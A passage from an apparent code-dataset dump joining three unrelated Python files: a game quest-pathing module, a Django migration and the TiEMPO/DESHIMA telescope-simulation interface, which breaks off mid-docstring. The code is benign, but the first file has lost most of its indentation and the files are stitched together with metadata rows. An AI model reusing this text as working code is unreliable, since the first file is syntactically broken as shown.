goalLevel = self.__goalData.get(self.LEVEL_IDX, 0)
if goalLevel > 0:
if goalLevel > object.getLevel():
return 1
hasIsShip = hasattr(object, '_isShip')
if game.process == 'ai':
if not hasIsShip:
return -1
goalLocation = self.__goalData.get(self.LOCATION_IDX, None)
objectLocation = object.getParentObj()
if goalLocation and objectLocation and hasattr(objectLocation, 'getUniqueId') and not goalLocation == LocationConstants.LocationIds.ANY_LOCATION and not LocationConstants.isInArea(goalLocation, objectLocation.getUniqueId())[0]:
return 1
goalFaction = hasIsShip and object._isShip() and self.getTargetTypeOnlyOnOcean() and self.__goalData.get(self.FACTION_IDX, None)
if goalFaction:
isEnemy = False
if goalOwner:
isEnemy = TeamUtils.friendOrFoe(goalOwner, object) == PiratesGlobals.ENEMY
objFaction = object.getFaction()
if goalFaction != None and objFaction != None and goalFaction.getFaction() != objFaction.getFaction() or not isEnemy:
return 1
goalHull = self.__goalData.get(self.HULL_IDX, None)
if goalHull != None:
shipClassList = QuestConstants.getShipList(goalHull)
if shipClassList == None:
shipClassList = [
goalHull]
if object.shipClass not in shipClassList:
return 1
goalFlagship = self.__goalData.get(self.FLAGSHIP_IDX, False)
if goalFlagship != object.isFlagship:
return 1
if object.getTeam() == PiratesGlobals.PLAYER_TEAM:
return 1
return 0
elif self.getTargetTypeOnlyOnOcean() or self.__goalData.get(self.TYPE_IDX) == AvatarTypes.AnyAvatar:
if goalOwner:
if TeamUtils.friendOrFoe(goalOwner, object) == PiratesGlobals.ENEMY:
return 0
elif object.getAvatarType().isA(self.__goalData.get(self.TYPE_IDX)):
return 0
else:
if self.__goalData and object.getUniqueId() in self.__goalData:
return 0
return 1
def getGoalIds(self, uidMgr=None, all=True):
if all:
results = [
(0, '')]
else:
results = ''
if self.__goalType == types.ListType:
if all:
uidData = self.__goalData
else:
uidData = self.__goalData[:1]
if uidMgr:
results = zip(map(lambda x: uidMgr.getDoId(x, None), uidData), uidData)
elif len(uidData) == 0:
results = ''
else:
results = uidData[0]
return results
def _asString(self):
if self.__goalDataStr != None:
return self.__goalDataStr
if self.__goalData == None:
resultStr = ''
if self.__goalType == types.ListType:
resultStr = str(self.__goalData)
else:
strRep = ''
for currField in range(self.MAX_IDX):
strRep += str(self.__goalData.get(currField, None))
strRep += '-'
resultStr = strRep
self.__goalDataStr = resultStr
return resultStr
def __repr__(self):
return self._asString()
def __str__(self):
return self._asString()
def __cmp__(self, other):
strRep = self._asString()
otherStrRep = other._asString()
if strRep < otherStrRep:
return -1
else:
if strRep > otherStrRep:
return 1
return 0
def __hash__(self):
result = hash(self._asString())
return result
class QuestStep:
__module__ = __name__
STNPC = 1
STItem = 2
STArea = 3
STTunnel = 4
STExteriorDoor = 5
STInteriorDoor = 6
STDinghy = 7
STShip = 8
STNPCArea = 9
STQuestNode = 10
STNPCEnemy = 11
STQuestProp = 12
NullStep = None
notify = DirectNotifyGlobal.directNotify.newCategory('QuestStep')
def __init__(self, originDoId, stepDoId, stepType, posH=(0, 0, 0, 0), islandUid='', targetAreaUid='', targetAvatarType=None, nodeSizes=(0, 0), nearOffset=(0, 0, 0), nearVis=(0, 0, 0)):
self.originDoId = originDoId
self.stepDoId = stepDoId
self.stepType = stepType
self.posH = posH
self.islandUid = islandUid
self.targetAreaUid = targetAreaUid
self.targetAvatarType = targetAvatarType
self.nodeSizes = nodeSizes
self.nearOffset = nearOffset
self.nearVis = nearVis
def __repr__(self):
return 'QuestStep(%d, %d, %d, %s, %s, %s, %s, %s, %s, %s)' % (self.getOriginDoId(), self.getStepDoId(), self.getStepType(), `(self.getPosH())`, self.getIsland(), self.getTargetArea(), self.targetAvatarType, self.nodeSizes, self.nearOffset, self.nearVis)
def __cmp__(self, other):
return not isinstance(other, QuestStep) or cmp(self.originDoId, other.originDoId) or cmp(self.stepDoId, other.stepDoId) or cmp(self.stepType, other.stepType) or cmp(self.posH, other.posH) or cmp(self.islandUid, other.islandUid) or cmp(self.targetAreaUid, other.targetAreaUid) or cmp(self.targetAvatarType, other.targetAvatarType) or cmp(self.nodeSizes, other.nodeSizes) or cmp(self.nearOffset, other.nearOffset) or cmp(self.nearVis, other.nearVis)
def compareTarget(self, other):
try:
return not isinstance(other, QuestStep) or cmp(self.originDoId, other.originDoId) or cmp(self.stepDoId, other.stepDoId) or cmp(self.stepType, other.stepType) or cmp(self.islandId, other.islandId) or cmp(self.targetAreaId, other.targetAreaId) or cmp(self.targetAvatarType, other.targetAvatarType) or cmp(self.nodeSizes, other.nodeSizes) or cmp(self.nearOffset, other.nearOffset) or cmp(self.nearVis, other.nearVis)
except:
self.notify.warning('error encountered when comparing queststeps %s and %s' % (self, other))
return 0
def getOriginDoId(self):
return self.originDoId
def getStepDoId(self):
return self.stepDoId
def getStepType(self):
return self.stepType
def getPosH(self):
return self.posH
def setIsland(self, islandUid=''):
self.islandUid = islandUid
def getIsland(self):
return self.islandUid
def setTargetArea(self, targetUid=''):
self.targetAreaUid = targetUid
def getTargetArea(self):
return self.targetAreaUid
def getNodeSizes(self):
return self.nodeSizes
def getNearOffset(self):
return self.nearOffset
def getNearVis(self):
return self.nearVis
@staticmethod
def getNullStep():
        if not QuestStep.NullStep:
            QuestStep.NullStep = QuestStep(0, 0, 0)
return QuestStep.NullStep
def showIndicator(self):
targetLocation = self.getTargetArea()
parentObj = localAvatar.getParentObj()
if config.GetBool('dynamic-rayoflight-area-only', True) and parentObj and hasattr(parentObj, 'uniqueId') and parentObj.uniqueId == targetLocation:
return False
return True
class QuestPath:
__module__ = __name__
notify = DirectNotifyGlobal.directNotify.newCategory('QuestPath')
def __init__(self, air):
self.world = None
self.posH = (0, 0, 0, 0)
self.questSteps = {}
self.islandStep = None
self.islandDoId = None
self.preferredStepUids = set()
if __dev__:
pass
return
def delete(self):
self.islandDoId = None
self.islandStep = None
self.questSteps = {}
self.world = None
return
def setWorld(self, world):
self.world = world
def setQuestStepPosH(self, x, y, z, h):
self.posH = (
x, y, z, h)
def getIslandDoId(self):
        if not self.islandDoId and self._isIsland():
            self.islandDoId = self.doId
return self.islandDoId
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def getQuestStepIsland(self):
if self._isIsland():
return QuestStep(0, self.getIslandDoId(), self._getQuestStepType())
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def getQuestStep(self, questDestUid, islandDoId, avId):
if not self.getIslandDoId():
self.getExitIslandStep()
questIslandDoId = islandDoId
questIsland = None
isPrivate = False
goalType = questDestUid.getType()
if goalType != QuestGoal.Type_Custom:
if islandDoId == None:
questIslandDoId = self.world.getObjectIslandDoId(questDestUid)
isPrivate = self.world.getObjectIsPrivate(questDestUid)
if not questIslandDoId:
return
questIsland = self.air.doId2do.get(questIslandDoId)
if not questIsland:
return
islandObj = (questIslandDoId or goalType == QuestGoal.Type_Custom) and (self.getIslandDoId() == questIslandDoId or goalType == QuestGoal.Type_Custom) and not questDestUid.getTargetTypeOnlyOnOcean() and self.getIsland()
if islandObj:
if goalType == QuestGoal.Type_Custom:
if islandObj.notHasQuestGoal(questDestUid):
return QuestStep.NullStep
islandSearchResult = self.getIntoIslandStep(questDestUid, isPrivate, avId)
if islandObj:
if islandSearchResult == None or islandSearchResult == QuestStep.NullStep:
islandObj.setNotHasQuestGoal(questDestUid)
else:
searchArea = self._checkNeedDinghyStep(avId, islandSearchResult.getOriginDoId())
if searchArea:
return self._getLocalDinghy(avId, questDestUid, searchArea=searchArea)
return islandSearchResult
else:
step = self.getExitIslandStep()
if step:
return step
else:
dinghyStep = self._getLocalDinghy(avId, questDestUid)
if dinghyStep:
return dinghyStep
else:
destIsland = self.air.doId2do.get(questIslandDoId)
if destIsland:
return QuestStep(self.doId, questIslandDoId, questIsland._getQuestStepType())
return
def _checkNeedDinghyStep(self, avId, goalOriginId):
avObj = self.air.doId2do.get(avId)
if avObj:
avParent = avObj.getParentObj()
avIsland = avParent.getIsland()
if avParent is avIsland:
if goalOriginId != avParent.doId:
return avParent
return
def _getLocalDinghy(self, avId, questDestUid, searchArea=None):
avObj = self.air.doId2do.get(avId)
if avObj:
avZone = avObj.zoneId
if searchArea == None:
searchArea = self
dinghyId = self.world.queryGoalByObjectType(QuestGoal.GOAL_TYPE_DINGHY, avObj, questDestUid, searchArea)
dinghyObj = self.air.doId2do.get(dinghyId)
if dinghyObj:
dinghyPos = dinghyObj.getPos(searchArea)
return QuestStep(searchArea.doId, dinghyId, dinghyObj._getQuestStepType(), posH=(dinghyPos[0], dinghyPos[1], dinghyPos[2], dinghyObj.getH()), islandUid=self.getUniqueId())
return
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def getExitIslandStep(self):
if self._isIsland() or self._isShip():
return
if not self.islandStep:
self._getIslandPath([], [], {})
returnStep = copy.copy(self.islandStep)
return returnStep
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def getIntoIslandStep(self, questDestUid, isPrivate, avId=None):
questStep = self.questSteps.get(questDestUid)
if not questStep or config.GetBool('cache-quest-step', 1) == 0:
path = self._getQuestPath(questDestUid, isPrivate, [], [], {}, avId)
if path:
targetAreaUid = self.air.doId2do[path[len(path) - 1]].getParentObj().uniqueId
questStep = self.questSteps.get(questDestUid)
if questStep:
questStep.setTargetArea(targetAreaUid)
if questDestUid.getType() == QuestGoal.Type_Custom:
self.questSteps.pop(questDestUid, None)
return questStep
def getOntoOceanStep(self, questDestUid, avId):
questIds = self.world.queryGoal(questDestUid, self, avId)
for questDoId, questUid in questIds:
questGoalObj = self.air.doId2do.get(questDoId)
if questGoalObj:
questDest = QuestStep(self.world.worldGrid.doId, questDoId, questGoalObj._getQuestStepType(), questGoalObj._getQuestStepPosH())
avObj = self.air.doId2do.get(avId)
if avObj:
avObj.setQuestGoalDoId(questGoalObj)
return questDest
return QuestStep.NullStep
def _getExitLinkDoIds(self, questGoalUid):
if __dev__:
pass
return []
def _getQuestStepType(self):
if __dev__:
pass
return 0
def _isIsland(self):
if __dev__:
pass
return False
def _isShip(self):
return False
def _getQuestStepPosH(self):
return self.posH
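    # The two path searches below (_getIslandPath and _getQuestPath) walk the graph of
    # connected areas through their exit links, using needToVisit as a FIFO queue and
    # pathDict as a child -> parent map, then rebuild the route by following pathDict
    # backwards from the goal and reversing it.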
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def _getIslandPath(self, alreadyVisited, needToVisit, pathDict):
islandPath = []
needToStore = False
if not islandPath:
if self._isIsland():
islandPath = alreadyVisited + [self.doId]
if islandPath:
finalPath = [
islandPath[-1]]
next = pathDict.get(finalPath[-1])
while next:
finalPath.append(next)
next = pathDict.get(finalPath[-1])
finalPath.reverse()
else:
exitLinks = [ linkDoId for linkDoId in self._getExitLinkDoIds(None) if linkDoId not in alreadyVisited if linkDoId not in needToVisit ]
for link in exitLinks:
pathDict[link] = self.doId
needToVisit += exitLinks
if needToVisit:
nextDoId = needToVisit.pop(0)
nextStep = self.air.doId2do[nextDoId]
finalPath = nextStep._getIslandPath(alreadyVisited + [self.doId], needToVisit, pathDict)
needToStore = True
else:
finalPath = []
if needToStore and self.doId in finalPath:
self._storeIslandStep(finalPath)
return finalPath
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def _storeIslandStep(self, path):
stepDoId = path[path.index(self.doId) + 1]
step = self.air.doId2do[stepDoId]
if __dev__:
pass
self.islandStep = QuestStep(self.doId, stepDoId, step._getQuestStepType(), step._getQuestStepPosH())
self.islandDoId = step.islandDoId
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def _getQuestPath(self, questDestUid, isPrivate, alreadyVisited, needToVisit, pathDict, avId):
questDest = None
questPath = []
needToStore = False
if not isPrivate:
if not questPath:
questIds = self.world.queryGoal(questDestUid, self, avId)
for questDoId, questUid in questIds:
questGoalObj = self.air.doId2do.get(questDoId)
if questGoalObj:
if questGoalObj.getParentObj() is self or questGoalObj is self:
if questDoId != self.doId:
pathDict.setdefault(questDoId, self.doId)
newIds = [self.doId, questDoId]
else:
newIds = [
self.doId]
questPath = alreadyVisited + [self.doId, questDoId]
questDest = QuestStep(self.doId, questDoId, questGoalObj._getQuestStepType(), questGoalObj._getQuestStepPosH())
needToStore = True
avObj = self.air.doId2do.get(avId)
if avObj:
avObj.setQuestGoalDoId(questGoalObj)
break
else:
if questDoId != None:
pass
if questDestUid.getType() != QuestGoal.Type_Custom and questUid:
try:
objInfo = self.air.worldCreator.getObjectDataFromFileByUid(questUid, self.getFileName())
if objInfo:
if objInfo.get('Type') == 'Dinghy':
pos = objInfo['Pos']
hpr = objInfo['Hpr']
questPath = alreadyVisited + [self.doId]
questDest = QuestStep(self.doId, 0, QuestStep.STQuestNode, (
pos[0], pos[1], pos[2], hpr[0]))
needToStore = True
break
elif objInfo.get('Type') == 'Quest Node':
pos = objInfo['Pos']
nodePos = None
parentUid = self.air.worldCreator.getObjectDataFromFileByUid(questUid, self.getFileName(), getParentUid=True)
if parentUid:
parentObj = self.world.uidMgr.justGetMeMeObject(parentUid)
if parentObj:
tform = TransformState.makePosHpr(parentObj.getPos(self), parentObj.getHpr(self))
nodePos = tform.getMat().xformPoint(pos)
if nodePos == None:
nodePos = pos
hpr = objInfo['Hpr']
at = int(float(objInfo['At']))
near = int(float(objInfo['Near']))
nearOffset = (int(objInfo['NearOffsetX']), int(objInfo['NearOffsetY']), int(objInfo['NearOffsetZ']))
nearVis = (
int(objInfo['NearVisX']), int(objInfo['NearVisY']), int(objInfo['NearVisZ']))
questPath = alreadyVisited + [self.doId]
questDest = QuestStep(self.doId, 0, QuestStep.STQuestNode, (
nodePos[0], nodePos[1], nodePos[2], hpr[0]), nodeSizes=[at, near], nearOffset=nearOffset, nearVis=nearVis)
needToStore = True
break
elif objInfo.get('Type') == 'Object Spawn Node':
pos = objInfo['Pos']
hpr = objInfo['Hpr']
questPath = alreadyVisited + [self.doId]
questDest = QuestStep(self.doId, 0, QuestStep.STArea, (
pos[0], pos[1], pos[2], hpr[0]))
needToStore = True
break
except AttributeError:
pass
else:
if not questPath:
if self.air.worldCreator.isObjectDefined(questDestUid.getGoalIds(all=False), self.world.getFileName() + '.py'):
questPath = alreadyVisited + [self.doId]
needToStore = False
if questPath:
finalPath = [
questPath[-1]]
next = pathDict.get(finalPath[-1])
while next:
finalPath.append(next)
next = pathDict.get(finalPath[-1])
finalPath.reverse()
else:
exitLinks = [ linkDoId for linkDoId in self._getExitLinkDoIds(questDestUid.getGoalIds(all=False)) if linkDoId not in alreadyVisited if linkDoId not in needToVisit ]
for link in exitLinks:
pathDict[link] = self.doId
needToVisit += exitLinks
if needToVisit:
nextDoId = needToVisit.pop(0)
nextStep = self.air.doId2do[nextDoId]
finalPath = nextStep._getQuestPath(questDestUid, isPrivate, alreadyVisited + [self.doId], needToVisit, pathDict, avId)
if questDestUid.getType() == QuestGoal.Type_Custom:
nextStep.questSteps.pop(questDestUid, None)
needToStore = True
else:
finalPath = []
needToStore = True
if needToStore and self.doId in finalPath:
self._storeQuestStep(finalPath, questDestUid, questDest)
if not finalPath:
self._storeQuestStep(finalPath, questDestUid, questStep=QuestStep.getNullStep())
return finalPath
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def _storeQuestStep(self, path, questDestUid, questStep=None):
if not questStep:
stepDoId = path[path.index(self.doId) + 1]
step = self.air.doId2do[stepDoId]
if __dev__:
pass
questStep = QuestStep(self.doId, stepDoId, step._getQuestStepType(), step._getQuestStepPosH())
self.questSteps[questDestUid] = questStep
def setAsPreferredStepFor(self, questGoalUid):
self.preferredStepUids.add(questGoalUid)
def isPreferredStep(self, questGoalUid):
return questGoalUid in self.preferredStepUids | 42.165247 | 455 | 0.562725 |
6add655847bdde2f01f155a6d99298fe21993e1a | 561 | py | Python | inventories/migrations/0016_auto_20200531_0048.py | amado-developer/ReadHub-RestfulAPI | 8d8b445c4a84810d52bbf78a2593e0b48351590c | [
"MIT"
] | null | null | null | inventories/migrations/0016_auto_20200531_0048.py | amado-developer/ReadHub-RestfulAPI | 8d8b445c4a84810d52bbf78a2593e0b48351590c | [
"MIT"
] | 7 | 2021-03-19T03:09:53.000Z | 2022-01-13T02:48:44.000Z | inventories/migrations/0016_auto_20200531_0048.py | amado-developer/ReadHub-RestfulAPI | 8d8b445c4a84810d52bbf78a2593e0b48351590c | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2020-05-31 00:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('digital_books', '0007_auto_20200527_2137'),
('inventories', '0015_auto_20200530_0500'),
]
operations = [
migrations.AlterField(
model_name='inventory',
name='digital_book',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='digital_books.Digital_Book'),
),
]
| 26.714286 | 125 | 0.659537 |
f25ea43b5f1322a214f8addefbb58d7f324a6433 | 19,396 | py | Python | tiempo_deshima/interface.py | Stefanie-B/DESHIMAmodel | bcb695ea64078f2a61cf9495e18909e29e1f2a98 | [
"MIT"
] | 2 | 2020-09-05T15:22:32.000Z | 2020-10-01T04:52:39.000Z | tiempo_deshima/interface.py | deshima-dev/tiempo_deshima | bcb695ea64078f2a61cf9495e18909e29e1f2a98 | [
"MIT"
] | 6 | 2020-10-30T17:13:07.000Z | 2021-07-28T12:13:15.000Z | tiempo_deshima/interface.py | Stefanie-B/DESHIMAmodel | bcb695ea64078f2a61cf9495e18909e29e1f2a98 | [
"MIT"
] | null | null | null | """
This module allows users to execute funtioncs in signal_transmitter, while providing default values so not all values need to be set manually.
"""
import numpy as np
#import signal_transmitter as st
#import DESHIMA.MKID.filterbank as ft
from pathlib import Path
from . import signal_transmitter as st
from .DESHIMA.MKID import filterbank as ft
import os
def calcMaxObsTime(dictionary):
"""
Calculates the maximum observing time, using the number of gridpoints in
one atmosphere strip, the gridwidth, the number of atmosphere strips and the
windspeed
"""
# maximum time
    # every strip has x_length_strip x-values (65536 by default)
max_obs_time = (dictionary['x_length_strip'] - 3 * dictionary['separation'])* \
dictionary['max_num_strips']*dictionary['grid'] \
/dictionary['windspeed']
return max_obs_time
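# Worked example using the get_dictionary() defaults below (illustrative only):
# with x_length_strip = 65536 gridpoints, separation = 1.1326 m, max_num_strips = 32,
# grid = 0.2 m and windspeed = 10 m/s, the formula above gives
#   (65536 - 3 * 1.1326) * 32 * 0.2 / 10  ~ 4.19e4 seconds (about 11.6 hours)
# of maximum observing time.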
def convert_folder(folder):
folder = folder.strip('/')
folder = folder.strip('\\')
sourcepath = Path.cwd()
while folder.startswith('.'):
folder = folder.strip('.')
folder = folder.strip('/')
folder = folder.strip('\\')
sourcepath = sourcepath.parent
sourcepath = sourcepath.joinpath(folder)
return sourcepath
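# Illustrative behaviour of convert_folder (folder names are made up):
#   convert_folder('output_TiEMPO')  -> <cwd>/output_TiEMPO
#   convert_folder('../ARIS_data')   -> <parent of cwd>/ARIS_data
# Each leading '.'-prefixed segment ('./' or '../') moves the base directory one
# level up before the remaining folder name is joined.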
def new_filterbank(dictionary):
"""
Parameters
----------
dictionary : dict
Dictionary obtained from get_dictionary() with the same keywords as run_tiempo() executed after this function. Input_dictionary in that function must be set to 'manual' or 'path'
Returns
-------
None.
Must be executed when the filter properties are changed.
"""
if dictionary['savefolder'] == None:
dictionary['savefolder'] = Path.cwd().joinpath('output_TiEMPO')
else:
dictionary['savefolder'] = convert_folder(dictionary['savefolder'])
dictionary['sourcefolder'] = convert_folder(dictionary['sourcefolder'])
length_EL_vector = 25
length_pwv_vector = 25
#test one value
pwv_vector = np.logspace(0., 0., length_pwv_vector)
EL_vector = np.linspace(60., 60., length_EL_vector)
#make interpolation curves
pwv_vector = np.logspace(-1, 0.35, length_pwv_vector)
EL_vector = np.linspace(20., 90., length_EL_vector)
ft1 = ft.filterbank(dictionary['F_min'], dictionary['spec_res'], dictionary['num_filters'], dictionary['f_spacing'], dictionary['num_bins'], dictionary['D1'])
ft1.save_TP_data(EL_vector, pwv_vector)
ft1.fit_TPpwvEL_curve(pwv_vector, EL_vector)
ft1.save_etaF_data(pwv_vector, 90.)
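# Usage sketch (the prefix and folder names here are assumptions, not shipped defaults):
#   d = get_dictionary('manual', 'sample00', 'input_ARIS', 'run1', 'output_TiEMPO')
#   new_filterbank(d)  # re-run only when the filter properties change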
def get_dictionary(input_dictionary, prefix_atm_data, sourcefolder, save_name_data, savefolder, save_P=True, save_T=True, n_jobs = 30, n_batches = 8,\
obs_time = 2., grid = .2, x_length_strip = 65536., separation = 1.1326,\
galaxy_on = True, luminosity = 13.7, redshift = 4.43, linewidth = 600, \
EL = 60, EL_vec = None, max_num_strips = 32, pwv_0 = 1., F_min = 220e9, \
num_bins = 1500, spec_res = 500, f_spacing = 500, \
num_filters = 347, beam_radius = 5., useDESIM = 1, \
inclAtmosphere = 1, windspeed = 10, D1 = 0, \
dictionary_name = ''):
"""
Parameters
----------
input_dictionary : string
        'deshima_1', 'deshima_2', 'manual' or 'path'. Determines where the input values of keywords F_min thru D1 come from: either standard values for DESHIMA, manual entry from the keywords or from a txt file in the order of keywords obs_time thru D1.
prefix_atm_data : string
The prefix of the output of ARIS that is being used by the TiEMPO
sourcefolder : string
Folder where ARIS data used by the model is saved, relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\'
save_name_data : string
Prefix of the output of TiEMPO
savefolder : string
Folder where the output of the model will be saved relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\'
save_P : bool
determines whether the power in Watts is saved as an output. Default is True
save_T : bool
determines whether the sky temperature in Kelvins is saved as an output. Default is True.
n_jobs : int
maximum number of concurrently running jobs (size of thread-pool). -1 means all CPUs are used.
n_batches : int
number of batches the entire observation is divided up into. Default is 8.
obs_time : float, optional
Length of the observation in seconds. The default is 2..
grid : float, optional
The width of a grid square in the atmosphere map in meters. The default is .2.
x_length_strip : int, optional
The length of one atmosphere strip in the x direction in number of gridpoints (NOT METERS). The default is 65536.
separation : float, optional
Separation between two chop positions in m, assuming that the atmosphere is at 1km height. Default is 1.1326 (this corresponds to 116.8 arcsec).
galaxy_on : bool, optional
Determines whether there is a galaxy in position 2. The default is True.
luminosity : float, optional
        Luminosity of the galaxy in log(L_fir [L_sol]). The default is 13.7.
redshift : float, optional
The redshift of the galaxy. The default is 4.43.
linewidth : float, optional
Width of the spectral lines in the galaxy spectrum in km/s. The default is 600.
EL : float, optional
Elevation of the telescope in degrees. The default is 60.
EL_vec: vector of floats, optional
        If this parameter is set, it allows you to specify the elevation of the telescope in degrees per timestep, for example in the case of tracking a target. Vector must have a length of 160Hz * obs_time.
max_num_strips : int, optional
Number of atmosphere strips that are saved in the ARIS output folder. The default is 32.
pwv_0 : float, optional
Baseline value of precipitable water vapor that is added to the d(pwv) from ARIS in mm. The default is 1.
F_min : float, optional
Lowest center frequency of all the MKIDs. The default is 220e9.
num_bins : int, optional
determines the amount of bins used in the simulation of the galaxy spectrum. The default is 1500.
spec_res : float, optional
Spectral resolution. The default is 500.
f_spacing : float, optional
spacing between center frequencies = F/dF (mean). The default is 500.
num_filters : int, optional
Number of filters in the filterbank. The default is 347.
beam_radius : float, optional
Radius of the Gaussian beam in meters. The default is 5.
useDESIM : int, optional
1 or 0. Determines whether the simple atmospheric model is used (0) or the more sophisticated desim simulation (1). The default is 1.
inclAtmosphere : int, optional
1 or 0. Determines whether the atmosphere is included in the simulation. The default is 1 (yes).
windspeed: float, optional
        Speed of the wind in meters/second. The default is 10.
D1 : int, optional
1 or 0. Determines whether DESHIMA 1.0 is simulated. The default is 0.
dictionary_name : string, optional
        name of a txt file in which the values of optional keywords are saved. prefix_atm_data, sourcefolder, save_name_data, savefolder, n_jobs, save_P, save_T and EL_vec must still be set outside the file. Only used when input_dictionary is set to 'path'. The default is ''. Order of the entries in the txt file must be: F_min, num_bins, spec_res, f_spacing, num_filters, beam_radius, useDESIM, inclAtmosphere, D1, time, grid, x_length_strip, separation, galaxy_on, luminosity, redshift, linewidth, EL, max_num_strips, pwv_0, windspeed, n_batches.
Returns
-------
dictionary : dict
Dictionary with the above keywords.
"""
if input_dictionary == 'deshima_1':
dictionary = {
'F_min': 332e9,
'num_bins': 1500,
'spec_res': 300,
'f_spacing': 380,
'num_filters': 49,
'beam_radius': 5.,
'useDESIM': 1,
'inclAtmosphere': 1,
'D1': 1
}
elif input_dictionary == 'deshima_2':
dictionary = {
'F_min': 220e9,
'num_bins': 1500,
'spec_res': 500,
'f_spacing': 500,
'num_filters': 347,
'beam_radius': 5.,
'useDESIM': 1,
'inclAtmosphere': 1,
'D1': 0
}
elif input_dictionary == 'manual':
dictionary = {
'F_min': F_min,
'num_bins': num_bins,
'spec_res': spec_res,
'f_spacing': f_spacing,
'num_filters': num_filters,
'beam_radius': beam_radius,
'useDESIM': useDESIM,
'inclAtmosphere': inclAtmosphere,
'D1': D1
}
else:
        d = np.loadtxt(os.path.join(os.getcwd(), dictionary_name), comments='#')
dictionary = {
'F_min': d[0],
'num_bins': d[1],
'spec_res': d[2],
'f_spacing': d[3],
'num_filters': d[4],
'beam_radius': d[5],
'useDESIM': d[6],
'inclAtmosphere': d[7],
'D1': d[8],
'time': d[9],
'grid':d[10],
'x_length_strip':d[11],
'separation':d[12],
'galaxy_on':d[13],
'luminosity':d[14],
'redshift':d[15],
'linewidth':d[16],
'EL':d[17],
'max_num_strips':d[18],
'pwv_0':d[19],
'windspeed':d[20],
'n_batches':d[21],
'save_P': save_P,
'save_T': save_T,
'prefix_atm_data':prefix_atm_data,
'save_name_data':save_name_data,
'n_jobs':n_jobs,
'savefolder' : savefolder,
'sourcefolder' : sourcefolder,
'EL_vec': EL_vec
}
return dictionary
dictionary['n_jobs'] = int(n_jobs)
dictionary['time'] = obs_time
dictionary['prefix_atm_data']= prefix_atm_data
dictionary['grid']= grid
dictionary['x_length_strip']= float(x_length_strip)
dictionary['galaxy_on'] = galaxy_on
dictionary['luminosity']= luminosity
dictionary['redshift']= redshift
dictionary['linewidth']= linewidth
dictionary['EL']= EL
dictionary['max_num_strips']= max_num_strips
dictionary['save_name_data']= save_name_data
dictionary['pwv_0'] = pwv_0
dictionary['windspeed'] = windspeed
dictionary['savefolder'] = savefolder
dictionary['sourcefolder'] = sourcefolder
dictionary['EL_vec'] = EL_vec
dictionary['save_P'] = save_P
dictionary['save_T'] = save_T
dictionary['n_batches'] = int(n_batches)
dictionary['separation'] = separation
return dictionary
def run_tiempo(input_dictionary, prefix_atm_data, sourcefolder, save_name_data, savefolder = None, save_P=True, save_T=True, n_jobs = 30, n_batches = 8,\
obs_time = 3600., grid = .2, x_length_strip = 65536., separation = 1.1326,\
galaxy_on = True, luminosity = 13.7, redshift = 4.43, linewidth = 600, \
EL = 60, EL_vec=None, max_num_strips = 32, pwv_0 = 1., F_min = 220e9, \
num_bins = 1500, spec_res = 500, f_spacing = 500, \
num_filters = 347, beam_radius = 5., useDESIM = 1, \
inclAtmosphere = 1, windspeed = 10, D1 = 0, dictionary_name = ''):
"""
Parameters
----------
input_dictionary : string
        'deshima_1', 'deshima_2', 'manual' or 'path'. Determines where the input values of keywords F_min thru D1 come from: either standard values for DESHIMA, manual entry from the keywords or from a txt file.
prefix_atm_data : string
The prefix of the output of ARIS that is being used by the TiEMPO
sourcefolder : string
Folder where ARIS data used by the model is saved, relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\'
save_name_data : string
Prefix of the output of TiEMPO
savefolder : string
Folder where the output of the model will be saved relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\'
save_P : bool
determines whether the power in Watts is saved as an output. Default is True
save_T : bool
determines whether the sky temperature in Kelvins is saved as an output. Default is True.
n_jobs : int
maximum number of concurrently running jobs (size of thread-pool). -1 means all CPUs are used.
n_batches : int
number of batches the entire observation is divided up into. Default is 8.
obs_time : float, optional
        Length of the observation in seconds. The default is 3600.
grid : float, optional
The width of a grid square in the atmosphere map in meters. The default is .2.
x_length_strip : int, optional
The length of one atmosphere strip in the x direction in number of gridpoints (NOT METERS). The default is 65536.
separation : float, optional
Separation between two chop positions in m, assuming that the atmosphere is at 1km height. Default is 1.1326 (this corresponds to 116.8 arcsec).
galaxy_on : bool, optional
        Determines whether there is a galaxy in position 2. The default is True.
luminosity : float, optional
        Luminosity of the galaxy in log(L_fir [L_sol]). The default is 13.7.
redshift : float, optional
The redshift of the galaxy. The default is 4.43.
linewidth : float, optional
Width of the spectral lines in the galaxy spectrum in km/s. The default is 600.
EL : float, optional
Elevation of the telescope in degrees. The default is 60.
EL_vec: vector of floats, optional
        If this parameter is set, it allows you to specify the elevation of the telescope in degrees per timestep, for example in the case of tracking a target. Vector must have a length of 160Hz * obs_time.
max_num_strips : int, optional
Number of atmosphere strips that are saved in the ARIS output folder. The default is 32.
pwv_0 : float, optional
Baseline value of precipitable water vapor that is added to the d(pwv) from ARIS in mm. The default is 1.
F_min : float, optional
Lowest center frequency of all the MKIDs. The default is 220e9.
num_bins : int, optional
determines the amount of bins used in the simulation of the galaxy spectrum. The default is 1500.
spec_res : float, optional
Spectral resolution. The default is 500.
f_spacing : float, optional
spacing between center frequencies = F/dF (mean). The default is 500.
num_filters : int, optional
Number of filters in the filterbank. The default is 347.
beam_radius : float, optional
Radius of the Gaussian beam in meters. The default is 5.
useDESIM : int, optional
1 or 0. Determines whether the simple atmospheric model is used (0) or the more sophisticated desim simulation (1). The default is 1.
inclAtmosphere : int, optional
        1 or 0. Determines whether the atmosphere is included in the simulation. The default is 1 (yes).
windspeed: float, optional
        Speed of the wind in meters/second. The default is 10.
D1 : int, optional
1 or 0. Determines whether DESHIMA 1.0 is simulated. The default is 0.
dictionary_name : string, optional
